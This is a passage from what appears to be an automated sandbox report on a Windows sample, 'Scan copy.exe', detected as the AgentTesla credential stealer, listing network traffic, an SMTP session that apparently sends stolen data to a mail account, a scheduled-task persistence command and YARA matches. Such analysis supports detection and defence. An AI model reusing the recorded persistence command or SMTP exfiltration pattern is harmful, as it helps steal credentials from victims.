                                                        Jun 11, 2021 13:23:02.843264103 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:02.895612001 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:02.898061991 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:02.998224974 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.000294924 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.054177046 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.058360100 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.110797882 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.112212896 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.172770023 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.174007893 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.226429939 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.226996899 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.281184912 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.281603098 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.335031033 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.335064888 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.338582993 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.338742971 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.338839054 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.338928938 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:03.392868996 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.393224955 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.396302938 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:03.438699007 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:04.559192896 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:04.611941099 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:04.612221003 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:04.613600969 CEST49744587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:04.615945101 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:04.666496992 CEST5874974493.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:04.671503067 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:04.671622038 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:04.784070969 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:04.784559011 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:04.837129116 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:04.837739944 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:04.890913010 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:04.892991066 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:04.953788996 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:04.954688072 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.007021904 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:05.007286072 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.060039997 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:05.061201096 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.113466978 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:05.113507032 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:05.115653992 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.115833044 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.115981102 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.116146088 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.116367102 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.116513968 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.116611958 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.116727114 CEST49745587192.168.2.393.89.24.35
                                                        Jun 11, 2021 13:23:05.168135881 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:05.168453932 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:05.168575048 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:05.168725967 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:05.171982050 CEST5874974593.89.24.35192.168.2.3
                                                        Jun 11, 2021 13:23:05.220001936 CEST49745587192.168.2.393.89.24.35

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jun 11, 2021 13:21:04.858053923 CEST5062053192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:04.908750057 CEST53506208.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:05.936623096 CEST6493853192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:05.959909916 CEST6015253192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:05.987988949 CEST53649388.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:06.023258924 CEST53601528.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:07.453860044 CEST5754453192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:07.503900051 CEST53575448.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:09.031088114 CEST5598453192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:09.081160069 CEST53559848.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:10.210530043 CEST6418553192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:10.260708094 CEST53641858.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:11.532289028 CEST6511053192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:11.585221052 CEST53651108.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:12.747402906 CEST5836153192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:12.798675060 CEST53583618.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:14.218070030 CEST6349253192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:14.279876947 CEST53634928.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:15.443774939 CEST6083153192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:15.505371094 CEST53608318.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:16.722050905 CEST6010053192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:16.775012970 CEST53601008.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:18.142812014 CEST5319553192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:18.192919970 CEST53531958.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:19.280986071 CEST5014153192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:19.331515074 CEST53501418.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:20.405694008 CEST5302353192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:20.456350088 CEST53530238.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:23.506949902 CEST4956353192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:23.565922976 CEST53495638.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:24.779799938 CEST5135253192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:24.829953909 CEST53513528.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:27.118074894 CEST5934953192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:27.170423985 CEST53593498.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:29.341922045 CEST5708453192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:29.392920017 CEST53570848.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:42.240418911 CEST5882353192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:42.325696945 CEST53588238.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:42.507977009 CEST5756853192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:42.566560030 CEST53575688.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:21:59.367866039 CEST5054053192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:21:59.431173086 CEST53505408.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:06.308432102 CEST5436653192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:06.451673031 CEST53543668.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:07.067660093 CEST5303453192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:07.357808113 CEST53530348.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:07.938100100 CEST5776253192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:07.955164909 CEST5543553192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:07.997762918 CEST53577628.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:08.021619081 CEST53554358.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:08.455746889 CEST5071353192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:08.514463902 CEST53507138.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:09.083976030 CEST5613253192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:09.144045115 CEST53561328.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:09.737756968 CEST5898753192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:09.801655054 CEST53589878.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:10.258017063 CEST5657953192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:10.317037106 CEST53565798.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:11.055785894 CEST6063353192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:11.116753101 CEST53606338.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:12.127274036 CEST6129253192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:12.186142921 CEST53612928.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:12.698261976 CEST6361953192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:12.761614084 CEST53636198.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:23.124176025 CEST6493853192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:23.185925007 CEST53649388.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:54.745781898 CEST6194653192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:54.806931019 CEST53619468.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:22:57.706727982 CEST6491053192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:22:57.770560026 CEST53649108.8.8.8192.168.2.3
                                                        Jun 11, 2021 13:23:02.635009050 CEST5212353192.168.2.38.8.8.8
                                                        Jun 11, 2021 13:23:02.712393045 CEST53521238.8.8.8192.168.2.3

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jun 11, 2021 13:23:02.635009050 CEST192.168.2.38.8.8.80xcf90Standard query (0)smtp.atlmexco.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jun 11, 2021 13:23:02.712393045 CEST8.8.8.8192.168.2.30xcf90No error (0)smtp.atlmexco.com93.89.24.35A (IP address)IN (0x0001)

                                                        SMTP Packets

                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Jun 11, 2021 13:23:02.998224974 CEST5874974493.89.24.35192.168.2.3220 atilim.atilimfuar.com ESMTP Exim 4.94 Fri, 11 Jun 2021 14:22:38 +0300
                                                        Jun 11, 2021 13:23:03.000294924 CEST49744587192.168.2.393.89.24.35EHLO 688098
                                                        Jun 11, 2021 13:23:03.054177046 CEST5874974493.89.24.35192.168.2.3250-atilim.atilimfuar.com Hello 688098 [84.17.52.18]
                                                        250-SIZE 52428800
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-X_PIPE_CONNECT
                                                        250-AUTH PLAIN LOGIN
                                                        250-STARTTLS
                                                        250 HELP
                                                        Jun 11, 2021 13:23:03.058360100 CEST49744587192.168.2.393.89.24.35AUTH login bWFrc2F0QGF0bG1leGNvLmNvbQ==
                                                        Jun 11, 2021 13:23:03.110797882 CEST5874974493.89.24.35192.168.2.3334 UGFzc3dvcmQ6
                                                        Jun 11, 2021 13:23:03.172770023 CEST5874974493.89.24.35192.168.2.3235 Authentication succeeded
                                                        Jun 11, 2021 13:23:03.174007893 CEST49744587192.168.2.393.89.24.35MAIL FROM:<maksat@atlmexco.com>
                                                        Jun 11, 2021 13:23:03.226429939 CEST5874974493.89.24.35192.168.2.3250 OK
                                                        Jun 11, 2021 13:23:03.226996899 CEST49744587192.168.2.393.89.24.35RCPT TO:<maksat@atlmexco.com>
                                                        Jun 11, 2021 13:23:03.281184912 CEST5874974493.89.24.35192.168.2.3250 Accepted
                                                        Jun 11, 2021 13:23:03.281603098 CEST49744587192.168.2.393.89.24.35DATA
                                                        Jun 11, 2021 13:23:03.335064888 CEST5874974493.89.24.35192.168.2.3354 Enter message, ending with "." on a line by itself
                                                        Jun 11, 2021 13:23:03.338928938 CEST49744587192.168.2.393.89.24.35.
                                                        Jun 11, 2021 13:23:03.396302938 CEST5874974493.89.24.35192.168.2.3250 OK id=1lrfFG-0002pD-QB
                                                        Jun 11, 2021 13:23:04.559192896 CEST49744587192.168.2.393.89.24.35QUIT
                                                        Jun 11, 2021 13:23:04.611941099 CEST5874974493.89.24.35192.168.2.3221 atilim.atilimfuar.com closing connection
                                                        Jun 11, 2021 13:23:04.784070969 CEST5874974593.89.24.35192.168.2.3220 atilim.atilimfuar.com ESMTP Exim 4.94 Fri, 11 Jun 2021 14:22:40 +0300
                                                        Jun 11, 2021 13:23:04.784559011 CEST49745587192.168.2.393.89.24.35EHLO 688098
                                                        Jun 11, 2021 13:23:04.837129116 CEST5874974593.89.24.35192.168.2.3250-atilim.atilimfuar.com Hello 688098 [84.17.52.18]
                                                        250-SIZE 52428800
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-X_PIPE_CONNECT
                                                        250-AUTH PLAIN LOGIN
                                                        250-STARTTLS
                                                        250 HELP
                                                        Jun 11, 2021 13:23:04.837739944 CEST49745587192.168.2.393.89.24.35AUTH login bWFrc2F0QGF0bG1leGNvLmNvbQ==
                                                        Jun 11, 2021 13:23:04.890913010 CEST5874974593.89.24.35192.168.2.3334 UGFzc3dvcmQ6
                                                        Jun 11, 2021 13:23:04.953788996 CEST5874974593.89.24.35192.168.2.3235 Authentication succeeded
                                                        Jun 11, 2021 13:23:04.954688072 CEST49745587192.168.2.393.89.24.35MAIL FROM:<maksat@atlmexco.com>
                                                        Jun 11, 2021 13:23:05.007021904 CEST5874974593.89.24.35192.168.2.3250 OK
                                                        Jun 11, 2021 13:23:05.007286072 CEST49745587192.168.2.393.89.24.35RCPT TO:<maksat@atlmexco.com>
                                                        Jun 11, 2021 13:23:05.060039997 CEST5874974593.89.24.35192.168.2.3250 Accepted
                                                        Jun 11, 2021 13:23:05.061201096 CEST49745587192.168.2.393.89.24.35DATA
                                                        Jun 11, 2021 13:23:05.113507032 CEST5874974593.89.24.35192.168.2.3354 Enter message, ending with "." on a line by itself
                                                        Jun 11, 2021 13:23:05.116727114 CEST49745587192.168.2.393.89.24.35.
                                                        Jun 11, 2021 13:23:05.171982050 CEST5874974593.89.24.35192.168.2.3250 OK id=1lrfFI-0002pW-J2

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: Scan copy.exe PID: 6048 Parent PID: 5692

                                                        General

                                                        Start time:13:21:10
                                                        Start date:11/06/2021
                                                        Path:C:\Users\user\Desktop\Scan copy.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\Scan copy.exe'
                                                        Imagebase:0x870000
                                                        File size:981504 bytes
                                                        MD5 hash:502390A59AAD886FA91210A1B89C89B5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.228452111.0000000003BD9000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.228452111.0000000003BD9000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Analysis Process: schtasks.exe PID: 5472 Parent PID: 6048

                                                        General

                                                        Start time:13:21:21
                                                        Start date:11/06/2021
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\emmrGOU' /XML 'C:\Users\user\AppData\Local\Temp\tmp3F10.tmp'
                                                        Imagebase:0x990000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 3864 Parent PID: 5472

                                                        General

                                                        Start time:13:21:21
                                                        Start date:11/06/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: Scan copy.exe PID: 5988 Parent PID: 6048

                                                        General

                                                        Start time:13:21:22
                                                        Start date:11/06/2021
                                                        Path:C:\Users\user\Desktop\Scan copy.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\Scan copy.exe
                                                        Imagebase:0xc70000
                                                        File size:981504 bytes
                                                        MD5 hash:502390A59AAD886FA91210A1B89C89B5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.467056763.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.467056763.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >